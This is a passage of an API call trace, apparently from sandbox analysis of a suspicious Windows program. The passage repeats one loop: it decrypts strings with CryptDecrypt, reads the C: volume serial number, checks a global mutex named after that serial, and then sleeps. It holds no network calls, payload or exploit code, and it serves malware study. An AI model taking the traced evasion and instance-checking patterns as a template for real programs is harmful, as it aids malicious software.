hHeap=0x20f0000) returned 1 [0176.447] Sleep (dwMilliseconds=0x3e8) [0177.546] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0177.546] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32be8) returned 1 [0177.547] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0177.547] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0177.547] CryptDestroyKey (hKey=0xa32be8) returned 1 [0177.547] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0177.547] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0177.547] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0177.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32be8) returned 1 [0177.547] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0177.547] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0177.547] CryptDestroyKey (hKey=0xa32be8) returned 1 [0177.547] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0177.547] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0177.547] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0177.547] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0177.547] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.547] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0177.547] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0177.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32be8) returned 1 [0177.547] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0177.547] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0177.547] CryptDestroyKey (hKey=0xa32be8) returned 1 [0177.547] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0177.547] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x138 [0177.547] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x0) returned 0x102 [0177.547] CloseHandle (hObject=0x138) returned 1 [0177.548] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0177.548] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0177.548] Sleep (dwMilliseconds=0x3e8) [0178.550] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0178.550] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0178.550] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0178.550] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0178.550] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.550] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0178.550] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0178.550] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0178.550] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0178.550] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0178.550] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0178.550] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.550] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0178.550] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0178.550] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0178.550] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0178.550] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0178.551] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0178.551] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0178.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0178.551] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0178.551] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0178.551] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.551] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0178.551] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x134 [0178.551] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x0) returned 0x102 [0178.551] CloseHandle (hObject=0x134) returned 1 [0178.551] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0178.551] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0178.551] Sleep (dwMilliseconds=0x3e8) [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0179.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32de8) returned 1 [0179.565] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0179.565] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0179.565] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0179.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32de8) returned 1 [0179.565] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0179.565] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0179.565] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0179.565] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0179.565] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0179.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32de8) returned 1 [0179.565] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0179.565] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0179.565] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.565] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0179.565] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x154 [0179.565] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0x0) returned 0x102 [0179.565] CloseHandle (hObject=0x154) returned 1 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0179.565] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0179.566] Sleep (dwMilliseconds=0x3e8) [0180.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0180.705] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ae8) returned 1 [0180.705] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0180.705] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0180.705] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0180.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0180.705] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0180.705] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ae8) returned 1 [0180.705] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0180.705] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0180.705] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0180.707] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0180.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0180.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0180.707] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0180.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0180.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ae8) returned 1 [0180.708] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0180.708] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0180.708] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.708] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0180.708] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x17c [0180.708] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0x0) returned 0x102 [0180.708] CloseHandle (hObject=0x17c) returned 1 [0180.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0180.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0180.708] Sleep (dwMilliseconds=0x3e8) [0181.796] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0181.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d68) returned 1 [0181.796] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0181.796] CryptDecrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0181.797] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.797] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0181.797] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0181.797] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0181.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d68) returned 1 [0181.797] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0181.797] CryptDecrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0181.797] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0181.797] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0181.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0181.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0181.797] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0181.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0181.797] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0181.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d68) returned 1 [0181.797] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0181.797] CryptDecrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0181.797] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.797] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0181.797] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x178 [0181.797] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x0) returned 0x102 [0181.797] CloseHandle (hObject=0x178) returned 1 [0181.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0181.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0181.798] Sleep (dwMilliseconds=0x3e8) [0182.815] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0182.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ae8) returned 1 [0182.815] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0182.815] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0182.815] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.815] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0182.815] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0182.815] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0182.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ae8) returned 1 [0182.815] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0182.815] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0182.815] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.815] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0182.815] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0182.815] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0182.815] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0182.815] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0182.815] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0182.816] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0182.816] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ae8) returned 1 [0182.816] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0182.816] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0182.816] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.816] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0182.816] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x178 [0182.816] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x0) returned 0x102 [0182.816] CloseHandle (hObject=0x178) returned 1 [0182.816] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0182.816] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0182.816] Sleep (dwMilliseconds=0x3e8) [0183.839] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f16c0 [0183.839] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ca8) returned 1 [0183.851] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0183.851] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f80c | out: pbData=0x20f16c0, pdwDataLen=0x221f80c) returned 1 [0183.851] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16e8 [0183.851] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1600 [0183.851] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0183.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ca8) returned 1 [0183.851] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0183.851] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0183.851] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0183.851] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0183.851] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0183.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ca8) returned 1 [0183.851] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0183.851] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0183.851] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0183.851] OpenMutexW 